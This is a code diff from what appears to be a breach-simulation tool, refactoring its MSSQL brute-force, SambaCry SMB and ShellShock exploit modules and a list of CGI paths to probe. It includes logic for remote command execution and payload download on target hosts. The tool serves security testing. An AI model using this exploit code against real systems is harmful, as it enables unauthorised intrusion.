from infection_monkey.exploit.tools.http_tools import MonkeyHTTPServer from infection_monkey.exploit.tools.http_tools import MonkeyHTTPServer
from infection_monkey.exploit.tools.helpers import get_monkey_dest_path, build_monkey_commandline, get_monkey_depth from infection_monkey.exploit.tools.helpers import get_monkey_dest_path, build_monkey_commandline, get_monkey_depth
from infection_monkey.model import DROPPER_ARG from infection_monkey.model import DROPPER_ARG
from infection_monkey.utils.monkey_dir import get_monkey_dir_path
from infection_monkey.exploit.tools.payload_parsing import LimitedSizePayload from infection_monkey.exploit.tools.payload_parsing import LimitedSizePayload
from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError, FailedExploitationError
LOG = logging.getLogger(__name__) LOG = logging.getLogger(__name__)
class MSSQLExploiter(HostExploiter): class MSSQLExploiter(HostExploiter):
_EXPLOITED_SERVICE = 'MSSQL' _EXPLOITED_SERVICE = 'MSSQL'
_TARGET_OS_TYPE = ['windows'] _TARGET_OS_TYPE = ['windows']
EXPLOIT_TYPE = ExploitType.BRUTE_FORCE EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
@ -73,7 +71,7 @@ class MSSQLExploiter(HostExploiter):
self.remove_temp_dir() self.remove_temp_dir()
except Exception as e: except Exception as e:
raise ExploitingVulnerableMachineError, e.args, sys.exc_info()[2] raise ExploitingVulnerableMachineError(e.args).with_traceback(sys.exc_info()[2])
return True return True
@ -144,7 +142,7 @@ class MSSQLExploiter(HostExploiter):
def get_monkey_download_command(self): def get_monkey_download_command(self):
dst_path = get_monkey_dest_path(self.monkey_server.http_path) dst_path = get_monkey_dest_path(self.monkey_server.http_path)
monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.\ monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND. \
format(http_path=self.monkey_server.http_path, dst_path=dst_path) format(http_path=self.monkey_server.http_path, dst_path=dst_path)
prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
suffix = MSSQLExploiter.EXPLOIT_COMMAND_SUFFIX.format(payload_file_path=self.payload_file_path) suffix = MSSQLExploiter.EXPLOIT_COMMAND_SUFFIX.format(payload_file_path=self.payload_file_path)
@ -186,12 +184,12 @@ class MSSQLExploiter(HostExploiter):
LOG.warning('No user/password combo was able to connect to host: {0}:{1}, ' LOG.warning('No user/password combo was able to connect to host: {0}:{1}, '
'aborting brute force'.format(host, port)) 'aborting brute force'.format(host, port))
raise RuntimeError("Bruteforce process failed on host: {0}".format(self.host.ip_addr)) raise FailedExploitationError("Bruteforce process failed on host: {0}".format(self.host.ip_addr))
class MSSQLLimitedSizePayload(LimitedSizePayload): class MSSQLLimitedSizePayload(LimitedSizePayload):
def __init__(self, command, prefix="", suffix=""): def __init__(self, command, prefix="", suffix=""):
super(MSSQLLimitedSizePayload, self).__init__(command=command, super(MSSQLLimitedSizePayload, self).__init__(command=command,
max_length=MSSQLExploiter.MAX_XP_CMDSHELL_COMMAND_SIZE, max_length=MSSQLExploiter.MAX_XP_CMDSHELL_COMMAND_SIZE,
prefix=MSSQLExploiter.XP_CMDSHELL_COMMAND_START+prefix, prefix=MSSQLExploiter.XP_CMDSHELL_COMMAND_START + prefix,
suffix=suffix+MSSQLExploiter.XP_CMDSHELL_COMMAND_END) suffix=suffix + MSSQLExploiter.XP_CMDSHELL_COMMAND_END)

View File

@ -16,11 +16,11 @@ from impacket.smb3structs import SMB2_IL_IMPERSONATION, SMB2_CREATE, SMB2_FLAGS_
from impacket.smbconnection import SMBConnection from impacket.smbconnection import SMBConnection
import infection_monkey.monkeyfs as monkeyfs import infection_monkey.monkeyfs as monkeyfs
from infection_monkey.exploit import HostExploiter from infection_monkey.exploit.HostExploiter import HostExploiter
from infection_monkey.model import DROPPER_ARG from infection_monkey.model import DROPPER_ARG
from infection_monkey.network.smbfinger import SMB_SERVICE from infection_monkey.network.smbfinger import SMB_SERVICE
from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_target_monkey_by_os, get_monkey_depth from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_target_monkey_by_os, get_monkey_depth
from infection_monkey.exploit.tools.helpers import get_interface_to_target from infection_monkey.network.tools import get_interface_to_target
from infection_monkey.pyinstaller_utils import get_binary_file_path from infection_monkey.pyinstaller_utils import get_binary_file_path
from common.utils.attack_utils import ScanStatus from common.utils.attack_utils import ScanStatus
from infection_monkey.telemetry.attack.t1105_telem import T1105Telem from infection_monkey.telemetry.attack.t1105_telem import T1105Telem
@ -216,6 +216,9 @@ class SambaCryExploiter(HostExploiter):
pattern = re.compile(r'\d*\.\d*\.\d*') pattern = re.compile(r'\d*\.\d*\.\d*')
smb_server_name = self.host.services[SMB_SERVICE].get('name') smb_server_name = self.host.services[SMB_SERVICE].get('name')
if not smb_server_name:
LOG.info("Host: %s refused SMB connection" % self.host.ip_addr)
return False
samba_version = "unknown" samba_version = "unknown"
pattern_result = pattern.search(smb_server_name) pattern_result = pattern.search(smb_server_name)
is_vulnerable = False is_vulnerable = False
@ -227,13 +230,13 @@ class SambaCryExploiter(HostExploiter):
elif (samba_version_parts[0] == "4") and (samba_version_parts[1] <= "3"): elif (samba_version_parts[0] == "4") and (samba_version_parts[1] <= "3"):
is_vulnerable = True is_vulnerable = True
elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "4") and ( elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "4") and (
samba_version_parts[1] <= "13"): samba_version_parts[1] <= "13"):
is_vulnerable = True is_vulnerable = True
elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "5") and ( elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "5") and (
samba_version_parts[1] <= "9"): samba_version_parts[1] <= "9"):
is_vulnerable = True is_vulnerable = True
elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "6") and ( elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "6") and (
samba_version_parts[1] <= "3"): samba_version_parts[1] <= "3"):
is_vulnerable = True is_vulnerable = True
else: else:
# If pattern doesn't match we can't tell what version it is. Better try # If pattern doesn't match we can't tell what version it is. Better try
@ -392,7 +395,7 @@ class SambaCryExploiter(HostExploiter):
if fileName != '': if fileName != '':
smb2Create['Buffer'] = fileName.encode('utf-16le') smb2Create['Buffer'] = fileName.encode('utf-16le')
else: else:
smb2Create['Buffer'] = '\x00' smb2Create['Buffer'] = b'\x00'
if createContexts is not None: if createContexts is not None:
smb2Create['Buffer'] += createContexts smb2Create['Buffer'] += createContexts
@ -445,7 +448,12 @@ class SambaCryExploiter(HostExploiter):
return smb_client.getSMBServer().nt_create_andx(treeId, pathName, cmd=ntCreate) return smb_client.getSMBServer().nt_create_andx(treeId, pathName, cmd=ntCreate)
else: else:
return SambaCryExploiter.create_smb(smb_client, treeId, pathName, desiredAccess=FILE_READ_DATA, return SambaCryExploiter.create_smb(
shareMode=FILE_SHARE_READ, smb_client,
creationOptions=FILE_OPEN, creationDisposition=FILE_NON_DIRECTORY_FILE, treeId,
fileAttributes=0) pathName,
desiredAccess=FILE_READ_DATA,
shareMode=FILE_SHARE_READ,
creationOptions=FILE_OPEN,
creationDisposition=FILE_NON_DIRECTORY_FILE,
fileAttributes=0)

View File

View File

@ -7,7 +7,7 @@ from random import choice
import requests import requests
from common.utils.attack_utils import ScanStatus from common.utils.attack_utils import ScanStatus
from infection_monkey.exploit import HostExploiter from infection_monkey.exploit.HostExploiter import HostExploiter
from infection_monkey.exploit.tools.helpers import get_target_monkey, get_monkey_depth, build_monkey_commandline from infection_monkey.exploit.tools.helpers import get_target_monkey, get_monkey_depth, build_monkey_commandline
from infection_monkey.model import DROPPER_ARG from infection_monkey.model import DROPPER_ARG
from infection_monkey.exploit.shellshock_resources import CGI_FILES from infection_monkey.exploit.shellshock_resources import CGI_FILES
@ -132,7 +132,7 @@ class ShellShockExploiter(HostExploiter):
self._remove_lock_file(exploit, url, header) self._remove_lock_file(exploit, url, header)
if (http_thread.downloads != 1) or ( if (http_thread.downloads != 1) or (
'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)): 'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__) LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
continue continue
@ -172,14 +172,17 @@ class ShellShockExploiter(HostExploiter):
LOG.info("File %s exists on remote host" % file_path) LOG.info("File %s exists on remote host" % file_path)
return resp return resp
def attempt_exploit(self, url, attacks=_attacks): def attempt_exploit(self, url, attacks=None):
# Flag used to identify whether the exploit has successfully caused the # Flag used to identify whether the exploit has successfully caused the
# server to return a useful response # server to return a useful response
if not attacks:
attacks = self._attacks
LOG.debug("Attack Flag is: %s" % self.success_flag) LOG.debug("Attack Flag is: %s" % self.success_flag)
LOG.debug("Trying exploit for %s" % url) LOG.debug("Trying exploit for %s" % url)
for header, exploit in attacks.iteritems(): for header, exploit in list(attacks.items()):
attack = exploit + ' echo ' + self.success_flag + "; " + TEST_COMMAND attack = exploit + ' echo ' + self.success_flag + "; " + TEST_COMMAND
result = self.attack_page(url, header, attack) result = self.attack_page(url, header, attack)
if self.success_flag in result: if self.success_flag in result:
@ -206,8 +209,8 @@ class ShellShockExploiter(HostExploiter):
try: try:
LOG.debug("Header is: %s" % header) LOG.debug("Header is: %s" % header)
LOG.debug("Attack is: %s" % attack) LOG.debug("Attack is: %s" % attack)
r = requests.get(url, headers={header: attack}, verify=False, timeout=TIMEOUT) r = requests.get(url, headers={header: attack}, verify=False, timeout=TIMEOUT) # noqa: DUO123
result = r.content result = r.content.decode()
return result return result
except requests.exceptions.RequestException as exc: except requests.exceptions.RequestException as exc:
LOG.debug("Failed to run, exception %s" % exc) LOG.debug("Failed to run, exception %s" % exc)
@ -229,7 +232,7 @@ class ShellShockExploiter(HostExploiter):
attack_urls = [attack_path + url for url in url_list] attack_urls = [attack_path + url for url in url_list]
for u in attack_urls: for u in attack_urls:
try: try:
reqs.append(requests.head(u, verify=False, timeout=TIMEOUT)) reqs.append(requests.head(u, verify=False, timeout=TIMEOUT)) # noqa: DUO123
except requests.Timeout: except requests.Timeout:
timeout = True timeout = True
break break

View File

@ -1,406 +1,408 @@
# resource for shellshock attack # resource for shellshock attack
# copied and transformed from https://github.com/nccgroup/shocker/blob/master/shocker-cgi_list # copied and transformed from https://github.com/nccgroup/shocker/blob/master/shocker-cgi_list
CGI_FILES = (r'/', CGI_FILES = (
r'/admin.cgi', r'/',
r'/administrator.cgi', r'/admin.cgi',
r'/agora.cgi', r'/administrator.cgi',
r'/aktivate/cgi-bin/catgy.cgi', r'/agora.cgi',
r'/analyse.cgi', r'/aktivate/cgi-bin/catgy.cgi',
r'/apps/web/vs_diag.cgi', r'/analyse.cgi',
r'/axis-cgi/buffer/command.cgi', r'/apps/web/vs_diag.cgi',
r'/b2-include/b2edit.showposts.php', r'/axis-cgi/buffer/command.cgi',
r'/bandwidth/index.cgi', r'/b2-include/b2edit.showposts.php',
r'/bigconf.cgi', r'/bandwidth/index.cgi',
r'/cartcart.cgi', r'/bigconf.cgi',
r'/cart.cgi', r'/cartcart.cgi',
r'/ccbill/whereami.cgi', r'/cart.cgi',
r'/cgi-bin/14all-1.1.cgi', r'/ccbill/whereami.cgi',
r'/cgi-bin/14all.cgi', r'/cgi-bin/14all-1.1.cgi',
r'/cgi-bin/a1disp3.cgi', r'/cgi-bin/14all.cgi',
r'/cgi-bin/a1stats/a1disp3.cgi', r'/cgi-bin/a1disp3.cgi',
r'/cgi-bin/a1stats/a1disp4.cgi', r'/cgi-bin/a1stats/a1disp3.cgi',
r'/cgi-bin/addbanner.cgi', r'/cgi-bin/a1stats/a1disp4.cgi',
r'/cgi-bin/add_ftp.cgi', r'/cgi-bin/addbanner.cgi',
r'/cgi-bin/adduser.cgi', r'/cgi-bin/add_ftp.cgi',
r'/cgi-bin/admin/admin.cgi', r'/cgi-bin/adduser.cgi',
r'/cgi-bin/admin.cgi', r'/cgi-bin/admin/admin.cgi',
r'/cgi-bin/admin/getparam.cgi', r'/cgi-bin/admin.cgi',
r'/cgi-bin/adminhot.cgi', r'/cgi-bin/admin/getparam.cgi',
r'/cgi-bin/admin.pl', r'/cgi-bin/adminhot.cgi',
r'/cgi-bin/admin/setup.cgi', r'/cgi-bin/admin.pl',
r'/cgi-bin/adminwww.cgi', r'/cgi-bin/admin/setup.cgi',
r'/cgi-bin/af.cgi', r'/cgi-bin/adminwww.cgi',
r'/cgi-bin/aglimpse.cgi', r'/cgi-bin/af.cgi',
r'/cgi-bin/alienform.cgi', r'/cgi-bin/aglimpse.cgi',
r'/cgi-bin/AnyBoard.cgi', r'/cgi-bin/alienform.cgi',
r'/cgi-bin/architext_query.cgi', r'/cgi-bin/AnyBoard.cgi',
r'/cgi-bin/astrocam.cgi', r'/cgi-bin/architext_query.cgi',
r'/cgi-bin/AT-admin.cgi', r'/cgi-bin/astrocam.cgi',
r'/cgi-bin/AT-generate.cgi', r'/cgi-bin/AT-admin.cgi',
r'/cgi-bin/auction/auction.cgi', r'/cgi-bin/AT-generate.cgi',
r'/cgi-bin/auktion.cgi', r'/cgi-bin/auction/auction.cgi',
r'/cgi-bin/ax-admin.cgi', r'/cgi-bin/auktion.cgi',
r'/cgi-bin/ax.cgi', r'/cgi-bin/ax-admin.cgi',
r'/cgi-bin/axs.cgi', r'/cgi-bin/ax.cgi',
r'/cgi-bin/badmin.cgi', r'/cgi-bin/axs.cgi',
r'/cgi-bin/banner.cgi', r'/cgi-bin/badmin.cgi',
r'/cgi-bin/bannereditor.cgi', r'/cgi-bin/banner.cgi',
r'/cgi-bin/bb-ack.sh', r'/cgi-bin/bannereditor.cgi',
r'/cgi-bin/bb-histlog.sh', r'/cgi-bin/bb-ack.sh',
r'/cgi-bin/bb-hist.sh', r'/cgi-bin/bb-histlog.sh',
r'/cgi-bin/bb-hostsvc.sh', r'/cgi-bin/bb-hist.sh',
r'/cgi-bin/bb-replog.sh', r'/cgi-bin/bb-hostsvc.sh',
r'/cgi-bin/bb-rep.sh', r'/cgi-bin/bb-replog.sh',
r'/cgi-bin/bbs_forum.cgi', r'/cgi-bin/bb-rep.sh',
r'/cgi-bin/bigconf.cgi', r'/cgi-bin/bbs_forum.cgi',
r'/cgi-bin/bizdb1-search.cgi', r'/cgi-bin/bigconf.cgi',
r'/cgi-bin/blog/mt-check.cgi', r'/cgi-bin/bizdb1-search.cgi',
r'/cgi-bin/blog/mt-load.cgi', r'/cgi-bin/blog/mt-check.cgi',
r'/cgi-bin/bnbform.cgi', r'/cgi-bin/blog/mt-load.cgi',
r'/cgi-bin/book.cgi', r'/cgi-bin/bnbform.cgi',
r'/cgi-bin/boozt/admin/index.cgi', r'/cgi-bin/book.cgi',
r'/cgi-bin/bsguest.cgi', r'/cgi-bin/boozt/admin/index.cgi',
r'/cgi-bin/bslist.cgi', r'/cgi-bin/bsguest.cgi',
r'/cgi-bin/build.cgi', r'/cgi-bin/bslist.cgi',
r'/cgi-bin/bulk/bulk.cgi', r'/cgi-bin/build.cgi',
r'/cgi-bin/cached_feed.cgi', r'/cgi-bin/bulk/bulk.cgi',
r'/cgi-bin/cachemgr.cgi', r'/cgi-bin/cached_feed.cgi',
r'/cgi-bin/calendar/index.cgi', r'/cgi-bin/cachemgr.cgi',
r'/cgi-bin/cartmanager.cgi', r'/cgi-bin/calendar/index.cgi',
r'/cgi-bin/cbmc/forums.cgi', r'/cgi-bin/cartmanager.cgi',
r'/cgi-bin/ccvsblame.cgi', r'/cgi-bin/cbmc/forums.cgi',
r'/cgi-bin/c_download.cgi', r'/cgi-bin/ccvsblame.cgi',
r'/cgi-bin/cgforum.cgi', r'/cgi-bin/c_download.cgi',
r'/cgi-bin/.cgi', r'/cgi-bin/cgforum.cgi',
r'/cgi-bin/cgi_process', r'/cgi-bin/.cgi',
r'/cgi-bin/classified.cgi', r'/cgi-bin/cgi_process',
r'/cgi-bin/classifieds.cgi', r'/cgi-bin/classified.cgi',
r'/cgi-bin/classifieds/classifieds.cgi', r'/cgi-bin/classifieds.cgi',
r'/cgi-bin/classifieds/index.cgi', r'/cgi-bin/classifieds/classifieds.cgi',
r'/cgi-bin/.cobalt/alert/service.cgi', r'/cgi-bin/classifieds/index.cgi',
r'/cgi-bin/.cobalt/message/message.cgi', r'/cgi-bin/.cobalt/alert/service.cgi',
r'/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi', r'/cgi-bin/.cobalt/message/message.cgi',
r'/cgi-bin/commandit.cgi', r'/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi',
r'/cgi-bin/commerce.cgi', r'/cgi-bin/commandit.cgi',
r'/cgi-bin/common/listrec.pl', r'/cgi-bin/commerce.cgi',
r'/cgi-bin/compatible.cgi', r'/cgi-bin/common/listrec.pl',
r'/cgi-bin/Count.cgi', r'/cgi-bin/compatible.cgi',
r'/cgi-bin/csChatRBox.cgi', r'/cgi-bin/Count.cgi',
r'/cgi-bin/csGuestBook.cgi', r'/cgi-bin/csChatRBox.cgi',
r'/cgi-bin/csLiveSupport.cgi', r'/cgi-bin/csGuestBook.cgi',
r'/cgi-bin/CSMailto.cgi', r'/cgi-bin/csLiveSupport.cgi',
r'/cgi-bin/CSMailto/CSMailto.cgi', r'/cgi-bin/CSMailto.cgi',
r'/cgi-bin/csNews.cgi', r'/cgi-bin/CSMailto/CSMailto.cgi',
r'/cgi-bin/csNewsPro.cgi', r'/cgi-bin/csNews.cgi',
r'/cgi-bin/csPassword.cgi', r'/cgi-bin/csNewsPro.cgi',
r'/cgi-bin/csPassword/csPassword.cgi', r'/cgi-bin/csPassword.cgi',
r'/cgi-bin/csSearch.cgi', r'/cgi-bin/csPassword/csPassword.cgi',
r'/cgi-bin/csv_db.cgi', r'/cgi-bin/csSearch.cgi',
r'/cgi-bin/cvsblame.cgi', r'/cgi-bin/csv_db.cgi',
r'/cgi-bin/cvslog.cgi', r'/cgi-bin/cvsblame.cgi',
r'/cgi-bin/cvsquery.cgi', r'/cgi-bin/cvslog.cgi',
r'/cgi-bin/cvsqueryform.cgi', r'/cgi-bin/cvsquery.cgi',
r'/cgi-bin/day5datacopier.cgi', r'/cgi-bin/cvsqueryform.cgi',
r'/cgi-bin/day5datanotifier.cgi', r'/cgi-bin/day5datacopier.cgi',
r'/cgi-bin/db_manager.cgi', r'/cgi-bin/day5datanotifier.cgi',
r'/cgi-bin/dbman/db.cgi', r'/cgi-bin/db_manager.cgi',
r'/cgi-bin/dcforum.cgi', r'/cgi-bin/dbman/db.cgi',
r'/cgi-bin/dcshop.cgi', r'/cgi-bin/dcforum.cgi',
r'/cgi-bin/dfire.cgi', r'/cgi-bin/dcshop.cgi',
r'/cgi-bin/diagnose.cgi', r'/cgi-bin/dfire.cgi',
r'/cgi-bin/dig.cgi', r'/cgi-bin/diagnose.cgi',
r'/cgi-bin/directorypro.cgi', r'/cgi-bin/dig.cgi',
r'/cgi-bin/download.cgi', r'/cgi-bin/directorypro.cgi',
r'/cgi-bin/e87_Ba79yo87.cgi', r'/cgi-bin/download.cgi',
r'/cgi-bin/emu/html/emumail.cgi', r'/cgi-bin/e87_Ba79yo87.cgi',
r'/cgi-bin/emumail.cgi', r'/cgi-bin/emu/html/emumail.cgi',
r'/cgi-bin/emumail/emumail.cgi', r'/cgi-bin/emumail.cgi',
r'/cgi-bin/enter.cgi', r'/cgi-bin/emumail/emumail.cgi',
r'/cgi-bin/environ.cgi', r'/cgi-bin/enter.cgi',
r'/cgi-bin/ezadmin.cgi', r'/cgi-bin/environ.cgi',
r'/cgi-bin/ezboard.cgi', r'/cgi-bin/ezadmin.cgi',
r'/cgi-bin/ezman.cgi', r'/cgi-bin/ezboard.cgi',
r'/cgi-bin/ezshopper2/loadpage.cgi', r'/cgi-bin/ezman.cgi',
r'/cgi-bin/ezshopper3/loadpage.cgi', r'/cgi-bin/ezshopper2/loadpage.cgi',
r'/cgi-bin/ezshopper/loadpage.cgi', r'/cgi-bin/ezshopper3/loadpage.cgi',
r'/cgi-bin/ezshopper/search.cgi', r'/cgi-bin/ezshopper/loadpage.cgi',
r'/cgi-bin/faqmanager.cgi', r'/cgi-bin/ezshopper/search.cgi',
r'/cgi-bin/FileSeek2.cgi', r'/cgi-bin/faqmanager.cgi',
r'/cgi-bin/FileSeek.cgi', r'/cgi-bin/FileSeek2.cgi',
r'/cgi-bin/finger.cgi', r'/cgi-bin/FileSeek.cgi',
r'/cgi-bin/flexform.cgi', r'/cgi-bin/finger.cgi',
r'/cgi-bin/fom.cgi', r'/cgi-bin/flexform.cgi',
r'/cgi-bin/fom/fom.cgi', r'/cgi-bin/fom.cgi',
r'/cgi-bin/FormHandler.cgi', r'/cgi-bin/fom/fom.cgi',
r'/cgi-bin/FormMail.cgi', r'/cgi-bin/FormHandler.cgi',
r'/cgi-bin/gbadmin.cgi', r'/cgi-bin/FormMail.cgi',
r'/cgi-bin/gbook/gbook.cgi', r'/cgi-bin/gbadmin.cgi',
r'/cgi-bin/generate.cgi', r'/cgi-bin/gbook/gbook.cgi',
r'/cgi-bin/getdoc.cgi', r'/cgi-bin/generate.cgi',
r'/cgi-bin/gH.cgi', r'/cgi-bin/getdoc.cgi',
r'/cgi-bin/gm-authors.cgi', r'/cgi-bin/gH.cgi',
r'/cgi-bin/gm.cgi', r'/cgi-bin/gm-authors.cgi',
r'/cgi-bin/gm-cplog.cgi', r'/cgi-bin/gm.cgi',
r'/cgi-bin/guestbook.cgi', r'/cgi-bin/gm-cplog.cgi',
r'/cgi-bin/handler', r'/cgi-bin/guestbook.cgi',
r'/cgi-bin/handler.cgi', r'/cgi-bin/handler',
r'/cgi-bin/handler/netsonar', r'/cgi-bin/handler.cgi',
r'/cgi-bin/hitview.cgi', r'/cgi-bin/handler/netsonar',
r'/cgi-bin/hsx.cgi', r'/cgi-bin/hitview.cgi',
r'/cgi-bin/html2chtml.cgi', r'/cgi-bin/hsx.cgi',
r'/cgi-bin/html2wml.cgi', r'/cgi-bin/html2chtml.cgi',
r'/cgi-bin/htsearch.cgi', r'/cgi-bin/html2wml.cgi',
r'/cgi-bin/hw.sh', # testing r'/cgi-bin/htsearch.cgi',
r'/cgi-bin/icat', r'/cgi-bin/hw.sh', # testing
r'/cgi-bin/if/admin/nph-build.cgi', r'/cgi-bin/icat',
r'/cgi-bin/ikonboard/help.cgi', r'/cgi-bin/if/admin/nph-build.cgi',
r'/cgi-bin/ImageFolio/admin/admin.cgi', r'/cgi-bin/ikonboard/help.cgi',
r'/cgi-bin/imageFolio.cgi', r'/cgi-bin/ImageFolio/admin/admin.cgi',
r'/cgi-bin/index.cgi', r'/cgi-bin/imageFolio.cgi',
r'/cgi-bin/infosrch.cgi', r'/cgi-bin/index.cgi',
r'/cgi-bin/jammail.pl', r'/cgi-bin/infosrch.cgi',
r'/cgi-bin/journal.cgi', r'/cgi-bin/jammail.pl',
r'/cgi-bin/lastlines.cgi', r'/cgi-bin/journal.cgi',
r'/cgi-bin/loadpage.cgi', r'/cgi-bin/lastlines.cgi',
r'/cgi-bin/login.cgi', r'/cgi-bin/loadpage.cgi',
r'/cgi-bin/logit.cgi', r'/cgi-bin/login.cgi',
r'/cgi-bin/log-reader.cgi', r'/cgi-bin/logit.cgi',
r'/cgi-bin/lookwho.cgi', r'/cgi-bin/log-reader.cgi',
r'/cgi-bin/lwgate.cgi', r'/cgi-bin/lookwho.cgi',
r'/cgi-bin/MachineInfo', r'/cgi-bin/lwgate.cgi',
r'/cgi-bin/MachineInfo', r'/cgi-bin/MachineInfo',
r'/cgi-bin/magiccard.cgi', r'/cgi-bin/MachineInfo',
r'/cgi-bin/mail/emumail.cgi', r'/cgi-bin/magiccard.cgi',
r'/cgi-bin/maillist.cgi', r'/cgi-bin/mail/emumail.cgi',
r'/cgi-bin/mailnews.cgi', r'/cgi-bin/maillist.cgi',
r'/cgi-bin/mail/nph-mr.cgi', r'/cgi-bin/mailnews.cgi',
r'/cgi-bin/main.cgi', r'/cgi-bin/mail/nph-mr.cgi',
r'/cgi-bin/main_menu.pl', r'/cgi-bin/main.cgi',
r'/cgi-bin/man.sh', r'/cgi-bin/main_menu.pl',
r'/cgi-bin/mini_logger.cgi', r'/cgi-bin/man.sh',
r'/cgi-bin/mmstdod.cgi', r'/cgi-bin/mini_logger.cgi',
r'/cgi-bin/moin.cgi', r'/cgi-bin/mmstdod.cgi',
r'/cgi-bin/mojo/mojo.cgi', r'/cgi-bin/moin.cgi',
r'/cgi-bin/mrtg.cgi', r'/cgi-bin/mojo/mojo.cgi',
r'/cgi-bin/mt.cgi', r'/cgi-bin/mrtg.cgi',
r'/cgi-bin/mt/mt.cgi', r'/cgi-bin/mt.cgi',
r'/cgi-bin/mt/mt-check.cgi', r'/cgi-bin/mt/mt.cgi',
r'/cgi-bin/mt/mt-load.cgi', r'/cgi-bin/mt/mt-check.cgi',
r'/cgi-bin/mt-static/mt-check.cgi', r'/cgi-bin/mt/mt-load.cgi',
r'/cgi-bin/mt-static/mt-load.cgi', r'/cgi-bin/mt-static/mt-check.cgi',
r'/cgi-bin/musicqueue.cgi', r'/cgi-bin/mt-static/mt-load.cgi',
r'/cgi-bin/myguestbook.cgi', r'/cgi-bin/musicqueue.cgi',
r'/cgi-bin/.namazu.cgi', r'/cgi-bin/myguestbook.cgi',
r'/cgi-bin/nbmember.cgi', r'/cgi-bin/.namazu.cgi',
r'/cgi-bin/netauth.cgi', r'/cgi-bin/nbmember.cgi',
r'/cgi-bin/netpad.cgi', r'/cgi-bin/netauth.cgi',
r'/cgi-bin/newsdesk.cgi', r'/cgi-bin/netpad.cgi',
r'/cgi-bin/nlog-smb.cgi', r'/cgi-bin/newsdesk.cgi',
r'/cgi-bin/nph-emumail.cgi', r'/cgi-bin/nlog-smb.cgi',
r'/cgi-bin/nph-exploitscanget.cgi', r'/cgi-bin/nph-emumail.cgi',
r'/cgi-bin/nph-publish.cgi', r'/cgi-bin/nph-exploitscanget.cgi',
r'/cgi-bin/nph-test.cgi', r'/cgi-bin/nph-publish.cgi',
r'/cgi-bin/pagelog.cgi', r'/cgi-bin/nph-test.cgi',
r'/cgi-bin/pbcgi.cgi', r'/cgi-bin/pagelog.cgi',
r'/cgi-bin/perlshop.cgi', r'/cgi-bin/pbcgi.cgi',
r'/cgi-bin/pfdispaly.cgi', r'/cgi-bin/perlshop.cgi',
r'/cgi-bin/pfdisplay.cgi', r'/cgi-bin/pfdispaly.cgi',
r'/cgi-bin/phf.cgi', r'/cgi-bin/pfdisplay.cgi',
r'/cgi-bin/photo/manage.cgi', r'/cgi-bin/phf.cgi',
r'/cgi-bin/photo/protected/manage.cgi', r'/cgi-bin/photo/manage.cgi',
r'/cgi-bin/php-cgi', r'/cgi-bin/photo/protected/manage.cgi',
r'/cgi-bin/php.cgi', r'/cgi-bin/php-cgi',
r'/cgi-bin/php.fcgi', r'/cgi-bin/php.cgi',
r'/cgi-bin/ping.sh', r'/cgi-bin/php.fcgi',
r'/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi', r'/cgi-bin/ping.sh',
r'/cgi-bin/pollssi.cgi', r'/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi',
r'/cgi-bin/postcards.cgi', r'/cgi-bin/pollssi.cgi',
r'/cgi-bin/powerup/r.cgi', r'/cgi-bin/postcards.cgi',
r'/cgi-bin/printenv', r'/cgi-bin/powerup/r.cgi',
r'/cgi-bin/probecontrol.cgi', r'/cgi-bin/printenv',
r'/cgi-bin/profile.cgi', r'/cgi-bin/probecontrol.cgi',
r'/cgi-bin/publisher/search.cgi', r'/cgi-bin/profile.cgi',
r'/cgi-bin/quickstore.cgi', r'/cgi-bin/publisher/search.cgi',
r'/cgi-bin/quizme.cgi', r'/cgi-bin/quickstore.cgi',
r'/cgi-bin/ratlog.cgi', r'/cgi-bin/quizme.cgi',
r'/cgi-bin/r.cgi', r'/cgi-bin/ratlog.cgi',
r'/cgi-bin/register.cgi', r'/cgi-bin/r.cgi',
r'/cgi-bin/replicator/webpage.cgi/', r'/cgi-bin/register.cgi',
r'/cgi-bin/responder.cgi', r'/cgi-bin/replicator/webpage.cgi/',
r'/cgi-bin/robadmin.cgi', r'/cgi-bin/responder.cgi',
r'/cgi-bin/robpoll.cgi', r'/cgi-bin/robadmin.cgi',
r'/cgi-bin/rtpd.cgi', r'/cgi-bin/robpoll.cgi',
r'/cgi-bin/sbcgi/sitebuilder.cgi', r'/cgi-bin/rtpd.cgi',
r'/cgi-bin/scoadminreg.cgi', r'/cgi-bin/sbcgi/sitebuilder.cgi',
r'/cgi-bin-sdb/printenv', r'/cgi-bin/scoadminreg.cgi',
r'/cgi-bin/sdbsearch.cgi', r'/cgi-bin-sdb/printenv',
r'/cgi-bin/search', r'/cgi-bin/sdbsearch.cgi',
r'/cgi-bin/search.cgi', r'/cgi-bin/search',
r'/cgi-bin/search/search.cgi', r'/cgi-bin/search.cgi',
r'/cgi-bin/sendform.cgi', r'/cgi-bin/search/search.cgi',
r'/cgi-bin/shop.cgi', r'/cgi-bin/sendform.cgi',
r'/cgi-bin/shopper.cgi', r'/cgi-bin/shop.cgi',
r'/cgi-bin/shopplus.cgi', r'/cgi-bin/shopper.cgi',
r'/cgi-bin/showcheckins.cgi', r'/cgi-bin/shopplus.cgi',
r'/cgi-bin/simplestguest.cgi', r'/cgi-bin/showcheckins.cgi',
r'/cgi-bin/simplestmail.cgi', r'/cgi-bin/simplestguest.cgi',
r'/cgi-bin/smartsearch.cgi', r'/cgi-bin/simplestmail.cgi',
